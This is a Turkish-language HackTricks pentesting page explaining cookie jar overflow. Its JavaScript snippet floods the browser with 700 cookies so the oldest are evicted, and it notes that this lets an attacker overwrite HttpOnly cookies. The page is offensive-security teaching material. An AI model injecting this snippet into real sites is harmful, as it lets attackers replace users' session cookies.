hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
2024-02-10 18:14:16 +00:00

3.2 KiB
Raw Blame History

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Tarayıcıların bir sayfa için depolayabileceği çerez sayısı sınırlıdır. Bu nedenle, bir şekilde bir çerezi kaybolmasını sağlamanız gerekiyorsa, en eski olanlar silineceği için çerez kabını taşırabilirsiniz.

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Üçüncü taraf alan adına işaret eden çerezlerin üzerine yazılmayacağını unutmayın.

{% hint style="danger" %} Bu saldırı, HttpOnly çerezlerin üzerine yazmak için kullanılabilir çünkü silebilir ve istediğiniz değerle yeniden ayarlayabilirsiniz.

Bunu bu yazıdaki laboratuvarla kontrol edin. {% endhint %}

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Red Team Expert)'ı öğrenin!

HackTricks'i desteklemenin diğer yolları: